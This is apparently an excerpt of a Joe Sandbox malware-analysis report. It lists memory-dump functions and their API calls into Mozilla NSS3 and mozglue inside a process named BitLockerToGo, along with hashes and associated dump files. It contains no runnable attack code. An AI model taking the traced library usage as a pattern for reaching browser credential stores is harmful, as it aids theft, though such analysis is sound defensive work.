                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1569127702-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(?), ref: 6CADEE0B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: malloc.MOZGLUE(6CAE8D2D,?,00000000,?), ref: 6CAF0BF8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: TlsGetValue.KERNEL32(6CAE8D2D,?,00000000,?), ref: 6CAF0C15
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CADEEE1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CAD1D7E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD1D50: EnterCriticalSection.KERNEL32(?), ref: 6CAD1D8E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD1D50: PR_Unlock.NSS3(?), ref: 6CAD1DD3
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CADEE51
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CADEE65
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CADEEA2
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CADEEBB
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CADEED0
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CADEF48
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CADEF68
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CADEF7D
                                                                                                                                                                                                                                                                                                                    • PK11_DoesMechanism.NSS3(?,?), ref: 6CADEFA4
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CADEFDA
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CADF055
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CADF060
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2524771861-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 68625302c0e6246a5151e762d8188014ffc30d0c83bc65bf1a902c26e49c829e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 148519ca50ad557006aa0ca9b6a63dcfc573e09e33066ce1c1c3a2ba21569053
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68625302c0e6246a5151e762d8188014ffc30d0c83bc65bf1a902c26e49c829e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C98183B5A00215ABDF01DFA4DD45BDEBBB5BF0C358F190024E919A3711EB31E9A4CBA1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_SignatureLen.NSS3(?), ref: 6CAA4D80
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(00000000), ref: 6CAA4D95
                                                                                                                                                                                                                                                                                                                    • PORT_NewArena_Util.NSS3(00000800), ref: 6CAA4DF2
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAA4E2C
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CAA4E43
                                                                                                                                                                                                                                                                                                                    • PORT_NewArena_Util.NSS3(00000800), ref: 6CAA4E58
                                                                                                                                                                                                                                                                                                                    • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CAA4E85
                                                                                                                                                                                                                                                                                                                    • DER_Encode_Util.NSS3(?,?,6CBF05A4,00000000), ref: 6CAA4EA7
                                                                                                                                                                                                                                                                                                                    • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CAA4F17
                                                                                                                                                                                                                                                                                                                    • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CAA4F45
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAA4F62
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAA4F7A
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAA4F89
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAA4FC8
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1dea200e7e1cf6f8da642549adf16231ad3473add871c8ab993cbd580475b291
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4a7d49b6eb7a0a897816d01854307a65a02c16ea25c7e9e1bb493e7fdb13e822
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dea200e7e1cf6f8da642549adf16231ad3473add871c8ab993cbd580475b291
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D81B271908301AFE711CFA4DD40B5BB7E4AB88718F14952DF958CB641EB31E98ACB92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CD4F0
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9CD4FC
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9CD52A
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CD530
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9CD53F
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9CD55F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C9CD585
                                                                                                                                                                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C9CD5D3
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CD5F9
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9CD605
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9CD652
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9CD658
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9CD667
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9CD6A2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAD781D,00000000,6CACBE2C,?,6CAD6B1D,?,?,?,?,00000000,00000000,6CAD781D), ref: 6CAD6C40
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAD781D,?,6CACBE2C,?), ref: 6CAD6C58
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAD781D), ref: 6CAD6C6F
                                                                                                                                                                                                                                                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAD6C84
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAD6C96
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: TlsGetValue.KERNEL32(00000040,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA81267
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: EnterCriticalSection.KERNEL32(?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA8127C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA81291
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: PR_Unlock.NSS3(?,?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA812A0
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAD6CAA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                                                                    • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_value_text16.NSS3(?), ref: 6CB64CAF
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB64CFD
                                                                                                                                                                                                                                                                                                                    • sqlite3_value_text16.NSS3(?), ref: 6CB64D44
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C984A68), ref: 6C9B945E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9B9470
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9B9482
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B9420: __Init_thread_footer.LIBCMT ref: 6C9B949F
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9BEC84
                                                                                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9BEC8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9B94EE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9B9508
                                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C9BECA1
                                                                                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C9BECAE
                                                                                                                                                                                                                                                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C9BECC5
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C9BED0A
                                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9BED19
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C9BED28
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C9BED2F
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C9FF4B8), ref: 6C9BED59
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6C9BEC94
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                                                                    • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_initialize.NSS3 ref: 6CB62D9F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA1CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA7F9C9,?,6CA7F4DA,6CA7F9C9,?,?,6CA4369A), ref: 6CA1CA7A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA1CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA1CB26
                                                                                                                                                                                                                                                                                                                    • sqlite3_exec.NSS3(?,?,6CB62F70,?,?), ref: 6CB62DF9
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(00000000), ref: 6CB62E2C
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62E3A
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62E52
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(6CBCAAF9,?), ref: 6CB62E62
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62E70
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62E89
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62EBB
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62ECB
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(00000000), ref: 6CB62F3E
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CB62F4C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1957633107-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(6CAB3F23,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2C62
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2C76
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(00000000,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2C86
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(00000000,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2C93
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2CC6
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23,?), ref: 6CAB2CDA
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?,?,6CAB3F23), ref: 6CAB2CEA
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?), ref: 6CAB2CF7
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CAAE477,?,?,?,00000001,00000000,?), ref: 6CAB2D4D
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAB2D61
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(?,?), ref: 6CAB2D71
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAB2D7E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807AD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA1204A), ref: 6CA807E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,6CA1204A), ref: 6CA80864
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA80880
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,6CA1204A), ref: 6CA808CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808FB
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2446853827-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 387319f0e4e10073d3df49fb41dc4a6c0a7c187711b55ca835f72c1aea7e7b96
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d525901db5af90cb5368c69a710892b32b8be7ca8603a147bb3ccd652c351100
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 387319f0e4e10073d3df49fb41dc4a6c0a7c187711b55ca835f72c1aea7e7b96
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2851F8B5D00204ABDB009F74EC459AA7778FF09358B088625EC18A7B11E731EDA8C7E1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14C97
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CB0
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CC9
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D11
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D2A
                                                                                                                                                                                                                                                                                                                    • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D4A
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D57
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14D97
                                                                                                                                                                                                                                                                                                                    • PR_Lock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14DBA
                                                                                                                                                                                                                                                                                                                    • PR_WaitCondVar.NSS3 ref: 6CA14DD4
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14DE6
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14DEF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
